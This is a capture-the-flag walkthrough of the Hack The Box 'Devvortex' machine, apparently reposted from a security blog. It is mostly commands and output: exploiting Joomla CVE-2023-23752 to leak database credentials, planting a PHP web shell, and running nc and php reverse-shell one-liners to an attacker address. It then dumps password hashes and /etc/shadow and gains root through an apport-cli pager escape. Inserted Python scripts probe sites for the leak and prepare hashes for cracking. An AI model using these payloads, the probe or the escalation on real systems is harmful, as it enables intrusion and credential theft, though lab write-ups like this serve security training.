HTB-Devvortex(Easy)

admin · 2023-12-19 13:46:08 · 93 views

Key points: Joomla! 4.2 unauthenticated information disclosure (CVE-2023-23752), privilege escalation through apport-cli



Scan

┌──(kali㉿kali)-[~/Desktop/htb/Devvortex]
└─$ sudo nmap -sT --min-rate 10000 -p- 10.10.11.242
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 01:06 EST
Warning: 10.10.11.242 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.242
Host is up (0.30s latency).
Not shown: 41304 filtered tcp ports (no-response), 24229 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 172.01 seconds

┌──(kali㉿kali)-[~/Desktop/htb/Devvortex]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.11.242
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 01:09 EST
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.32s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 5.0 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.8 (93%), Linux 3.8 (93%), QNAP QTS 4.0 - 4.2 (93%), Linux 5.3 - 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.38 seconds



Enum

A directory scan turned up nothing useful, so scan for subdomains instead (vhost fuzzing on the Host header, filtering out the 154-character default response). This finds dev:

wfuzz -c -w ~/wordlists/subdomains-top1million-5000.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb" --hh 154

After adding dev.devvortex.htb to /etc/hosts, scan the new vhost's directories. This one has more to offer: robots.txt, README.txt and other sensitive files. The interesting route is /administrator.

The README reveals the version: Joomla! 4.2.

The /administrator route is a login form and needs credentials, so check for known exploits against this version:

searchsploit Joomla! 4

Opening the matching entry (searchsploit -x / locate) shows it is CVE-2023-23752. There are plenty of write-ups online: it is an unauthenticated information disclosure in the Joomla REST API (affects 4.0.0 through 4.2.7, fixed in 4.2.8), which hands out the database credentials and the user list without a login.

Reference article: https://xz.aliyun.com/t/12175

Visit: http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

Metasploit has a module for this as well:

use auxiliary/scanner/http/joomla_api_improper_access_checks
set rhosts dev.devvortex.htb
run

[+] Users JSON saved to /home/kali/.msf4/loot/20231126024141_default_10.10.11.242_joomla.users_040378.bin
[+] Joomla Users
============

 ID   Super User  Name        Username  Email              Send Email  Register Date        Last Visit Date      Group Names
 --   ----------  ----        --------  -----              ----------  -------------        ---------------      -----------
 649  *           lewis       lewis     [email protected]  1           2023-09-25 16:44:24  2023-11-26 07:37:20  Super Users
 650              logan paul  logan     [email protected]  0           2023-09-26 19:15:42                       Registered

[+] Config JSON saved to /home/kali/.msf4/loot/20231126024143_default_10.10.11.242_joomla.config_378615.bin
[+] Joomla Config
=============

 Setting        Value
 -------        -----
 db encryption  0
 db host        localhost
 db name        joomla
 db password    P4ntherg0t1n5r3c0n##
 db prefix      sd4fg_
 db user        lewis
 dbtype         mysqli
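To show what the two leaking endpoints actually return and how to read them, here is an added example (not code from the original writeup, Joomla, or the Metasploit module). The JSON shape mirrors the real /api/index.php/v1/config/application and /api/index.php/v1/users responses, which return one "attributes" object per item; the values are constructed from the data shown on this page, and the e-mail addresses are assumed. The fetch/probe helpers are only needed for a live check; the parsing runs offline.

```python
"""Added example, not part of the original writeup: parse what a Joomla
4.0.0-4.2.7 site leaks through its public REST API (CVE-2023-23752).
Sample data is constructed from the values shown on this page."""
import json
import urllib.error
import urllib.request

# Constructed sample: the config endpoint returns one data item per setting.
SAMPLE_CONFIG = json.dumps({
    "links": {"self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true"},
    "data": [
        {"type": "application", "id": "224", "attributes": {"offline": False, "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "lewis", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "P4ntherg0t1n5r3c0n##", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_", "id": 224}},
    ],
})

# Constructed sample for the users endpoint (e-mail addresses are assumed).
SAMPLE_USERS = json.dumps({
    "data": [
        {"type": "users", "id": "649", "attributes": {
            "id": 649, "name": "lewis", "username": "lewis", "email": "lewis@devvortex.htb",
            "block": 0, "sendEmail": 1, "registerDate": "2023-09-25 16:44:24",
            "lastvisitDate": "2023-11-26 07:37:20", "group_count": 1, "group_names": "Super Users"}},
        {"type": "users", "id": "650", "attributes": {
            "id": 650, "name": "logan paul", "username": "logan", "email": "logan@devvortex.htb",
            "block": 0, "sendEmail": 0, "registerDate": "2023-09-26 19:15:42",
            "lastvisitDate": None, "group_count": 1, "group_names": "Registered"}},
    ],
})

DB_KEYS = ("dbtype", "host", "user", "password", "db", "dbprefix")


def flatten_attributes(body):
    """Merge the one-key-per-item 'attributes' objects into a single dict.
    A patched site answers with an 'errors' list and no 'data', giving {}."""
    merged = {}
    for item in json.loads(body).get("data", []):
        for key, value in item.get("attributes", {}).items():
            if key != "id":  # the item id is not a config setting
                merged[key] = value
    return merged


def leaked_db_config(body):
    """Database settings exposed by /config/application, in a fixed key order."""
    attrs = flatten_attributes(body)
    return {k: attrs[k] for k in DB_KEYS if k in attrs}


def leaked_users(body):
    """Account list exposed by /users; flags Super Users, the admin-login targets."""
    users = []
    for item in json.loads(body).get("data", []):
        a = item.get("attributes", {})
        groups = a.get("group_names") or ""
        users.append({"id": a.get("id"), "username": a.get("username"),
                      "email": a.get("email"), "groups": groups,
                      "super": "Super Users" in groups})
    return users


def is_vulnerable(config_body):
    """True when the unauthenticated config response contains the DB password."""
    return "password" in leaked_db_config(config_body)


def fetch(base_url, path, timeout=10.0):
    """GET an API path with ?public=true, the parameter that bypasses the access check."""
    url = f"{base_url.rstrip('/')}/api/index.php/v1/{path}?public=true"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url):
    """Live check, e.g. probe('http://dev.devvortex.htb'); patched sites answer 401/403."""
    try:
        config = fetch(base_url, "config/application")
    except urllib.error.HTTPError as err:
        return {"vulnerable": False, "status": err.code}
    return {"vulnerable": is_vulnerable(config),
            "config": leaked_db_config(config),
            "users": leaked_users(fetch(base_url, "users"))}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(json.dumps(probe(sys.argv[1]), indent=2))
    else:  # offline run on the constructed samples
        print(json.dumps({"config": leaked_db_config(SAMPLE_CONFIG),
                          "users": leaked_users(SAMPLE_USERS)}, indent=2))
```

Run it with no arguments to see the parsed samples, or with a base URL to probe a target. The two things worth taking from the output are the db user/password pair (tried first against /administrator, since Joomla admins often reuse the database password) and which listed accounts sit in Super Users.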


Getshell

The credentials obtained above (lewis / P4ntherg0t1n5r3c0n##) log in to /administrator. From there go to System > Site Templates, open the active template (cassiopeia) and add a malicious PHP file, for example p0wny-shell:

https://github.com/flozz/p0wny-shell/blob/master/shell.php

Browse to the uploaded file under templates/cassiopeia/ and fire a reverse shell from it to get a shell as www-data.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.20 4444 >/tmp/f

php -r '$sock=fsockopen("10.10.14.20",4444);exec("sh <&3 >&3 2>&3");'

or any other reverse shell of your choice.

Upgrade to a tty with python. The database credentials were already leaked, so log in to MySQL: the users table holds the account hashes. /home contains a logan user, so his hash is the one to crack.

┌──(kali㉿kali)-[~/Desktop/htb]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.242] 37150
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ mysql -ulewis -p
Enter password: P4ntherg0t1n5r3c0n##
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8675
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)

mysql> use joomla
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
Tables_in_joomla:
sd4fg_action_log_config
sd4fg_action_logs
sd4fg_action_logs_extensions
sd4fg_action_logs_users
sd4fg_assets
sd4fg_associations
sd4fg_banner_clients
sd4fg_banner_tracks
sd4fg_banners
sd4fg_categories
sd4fg_contact_details
sd4fg_content
sd4fg_content_frontpage
sd4fg_content_rating
sd4fg_content_types
sd4fg_contentitem_tag_map
sd4fg_extensions
sd4fg_fields
sd4fg_fields_categories
sd4fg_fields_groups
sd4fg_fields_values
sd4fg_finder_filters
sd4fg_finder_links
sd4fg_finder_links_terms
sd4fg_finder_logging
sd4fg_finder_taxonomy
sd4fg_finder_taxonomy_map
sd4fg_finder_terms
sd4fg_finder_terms_common
sd4fg_finder_tokens
sd4fg_finder_tokens_aggregate
sd4fg_finder_types
sd4fg_history
sd4fg_languages
sd4fg_mail_templates
sd4fg_menu
sd4fg_menu_types
sd4fg_messages
sd4fg_messages_cfg
sd4fg_modules
sd4fg_modules_menu
sd4fg_newsfeeds
sd4fg_overrider
sd4fg_postinstall_messages
sd4fg_privacy_consents
sd4fg_privacy_requests
sd4fg_redirect_links
sd4fg_scheduler_tasks
sd4fg_schemas
sd4fg_session
sd4fg_tags
sd4fg_template_overrides
sd4fg_template_styles
sd4fg_ucm_base
sd4fg_ucm_content
sd4fg_update_sites
sd4fg_update_sites_extensions
sd4fg_updates
sd4fg_user_keys
sd4fg_user_mfa
sd4fg_user_notes
sd4fg_user_profiles
sd4fg_user_usergroup_map
sd4fg_usergroups
sd4fg_users
sd4fg_viewlevels
sd4fg_webauthn_credentials
sd4fg_workflow_associations
sd4fg_workflow_stages
sd4fg_workflow_transitions
sd4fg_workflows
71 rows in set (0.01 sec)

mysql> select * from sd4fg_users;
(the two rows, shown one column per line because the table is too wide)
*************************** 1. row ***************************
           id: 649
         name: lewis
     username: lewis
        email: [email protected]
     password: $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
        block: 0
    sendEmail: 1
 registerDate: 2023-09-25 16:44:24
lastvisitDate: 2023-11-26 08:08:20
   activation: 0
       params:
lastResetTime: NULL
   resetCount: 0
       otpKey:
         otep:
 requireReset: 0
 authProvider:
*************************** 2. row ***************************
           id: 650
         name: logan paul
     username: logan
        email: [email protected]
     password: $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
        block: 0
    sendEmail: 0
 registerDate: 2023-09-26 19:15:42
lastvisitDate: NULL
   activation:
       params: {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"}
lastResetTime: NULL
   resetCount: 0
       otpKey:
         otep:
 requireReset: 0
 authProvider:
2 rows in set (0.00 sec)

mysql>


ROOT

As logan, sudo -l shows a way to escalate through sudo: apport-cli may be run as root.

Reference (the upstream fix, which stops apport-cli from handing the report to a pager when it is running as root under sudo): https://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb

/var/crash is empty, so there is no existing crash report to open; instead hand apport-cli a file of our own with -c. When it asks what to do with the report, press V (view report): the report is opened in the less pager, which is still running as root, and less accepts shell escapes. Typing !id at the pager prompt runs id as root; !/bin/bash would give a root shell the same way.

sudo apport-cli -c /bin/id less


root:$6$kdYdkbdlt4MMS7Qx$/lIiEByq.cgsQPyd82QDfhA/Qb5IgaukiUN0OOKewugqr1qeFFiQ4t2sAdiyAmUssoeg3.h1k/2BpdTRthmum.:19654:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
sshd:*:18389:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18822:0:99999:7:::
fwupd-refresh:*:19612:0:99999:7:::
mysql:!:19624:0:99999:7:::
logan:$6$pkg18zw/pi3z1r.f$g.zN3Yi1iLQmEcsi5S57UMl7qWgUNoo8xA3Z4TczzM1nMK5NhXgW0J.DPvS4lG9UISgGk5zsYDOpk7uPBY2Ya1:19626:0:99999:7:::
_laurel:!:19656::::::
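Both hash stages of this box, the $2y$ bcrypt values pulled from sd4fg_users (the step where logan's hash gets cracked) and the $6$ sha512crypt values in the /etc/shadow dump above, need the same triage before they go into a cracker: drop the locked accounts, identify the algorithm, and pick the hashcat mode. The following is an added example (not from the original writeup) that does that; its sample data is constructed from the hashes shown on this page, and the hashcat modes are standard values (3200 for bcrypt, 1800 for sha512crypt).

```python
"""Added example, not part of the original writeup: triage the hashes
recovered on this box (bcrypt from the Joomla users table, sha512crypt from
/etc/shadow) into per-mode hashcat crack lists. Sample data is constructed
from what the page shows."""
from datetime import date, timedelta

# Constructed subset of the /etc/shadow dump from the page.
SAMPLE_SHADOW = """\
root:$6$kdYdkbdlt4MMS7Qx$/lIiEByq.cgsQPyd82QDfhA/Qb5IgaukiUN0OOKewugqr1qeFFiQ4t2sAdiyAmUssoeg3.h1k/2BpdTRthmum.:19654:0:99999:7:::
daemon:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
mysql:!:19624:0:99999:7:::
logan:$6$pkg18zw/pi3z1r.f$g.zN3Yi1iLQmEcsi5S57UMl7qWgUNoo8xA3Z4TczzM1nMK5NhXgW0J.DPvS4lG9UISgGk5zsYDOpk7uPBY2Ya1:19626:0:99999:7:::
"""

# Constructed from the sd4fg_users rows on the page (username, password column).
SAMPLE_DB_HASHES = [
    ("lewis", "$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u"),
    ("logan", "$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12"),
]

# crypt(3)/bcrypt prefixes and their hashcat -m modes. yescrypt ($y$) has no
# hashcat mode; john --format=crypt handles it through the system libcrypt.
HASHCAT_MODES = {"$2a$": 3200, "$2b$": 3200, "$2y$": 3200,
                 "$6$": 1800, "$5$": 7400, "$1$": 500, "$y$": None}
LOCKED_VALUES = {"", "*", "!", "!!"}


def hash_family(h):
    """Return the algorithm prefix of a hash string, or None if unrecognised."""
    for prefix in HASHCAT_MODES:
        if h.startswith(prefix):
            return prefix
    return None


def make_entry(user, h, last_change_days=None, source="shadow"):
    entry = {"user": user, "hash": h, "source": source,
             # '*', '!', '!!' or a '!'-prefixed hash means the account is locked
             "locked": h in LOCKED_VALUES or h.startswith("!"),
             "family": hash_family(h.lstrip("!")),
             "last_change": None}
    if last_change_days is not None:
        # shadow field 3 is the last password change in days since 1970-01-01
        entry["last_change"] = date(1970, 1, 1) + timedelta(days=last_change_days)
    return entry


def parse_shadow(text):
    """Parse /etc/shadow lines (9 colon-separated fields) into entries."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 3 or line.startswith("#"):
            continue
        days = int(fields[2]) if fields[2].isdigit() else None
        entries.append(make_entry(fields[0], fields[1], days))
    return entries


def from_db(pairs):
    """Wrap (username, hash) pairs from a web-app table in the same entry shape."""
    return [make_entry(user, h, source="db") for user, h in pairs]


def crackable(entries):
    """Entries that are unlocked and use an algorithm hashcat knows."""
    return [e for e in entries if not e["locked"] and HASHCAT_MODES.get(e["family"])]


def hashcat_jobs(entries):
    """Group crackable hashes by mode as 'user:hash' lines: {1800: [...], 3200: [...]}."""
    jobs = {}
    for e in crackable(entries):
        jobs.setdefault(HASHCAT_MODES[e["family"]], []).append(f"{e['user']}:{e['hash']}")
    return jobs


if __name__ == "__main__":
    everything = parse_shadow(SAMPLE_SHADOW) + from_db(SAMPLE_DB_HASHES)
    for mode, lines in hashcat_jobs(everything).items():
        print(f"# hashcat -m {mode} --username hashes_{mode}.txt wordlist.txt")
        print("\n".join(lines))
```

Running it prints one hashcat invocation per mode with the user:hash lines that belong to it; --username tells hashcat to ignore the user prefix. The last-change dates it decodes are a useful sanity check: logan's shadow entry (19626) decodes to 2023-09-26, the same day as his Joomla registerDate. Both bcrypt hashes are cost 10, so start with a targeted wordlist rather than a mask attack.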

Originally published on the WeChat public account 搁浅安全: HTB-Devvortex(Easy)

Posted by admin on 2023-12-19 13:46:08. Please keep this link when reposting (CN-SEC): https://cn-sec.com/archives/2241420.html
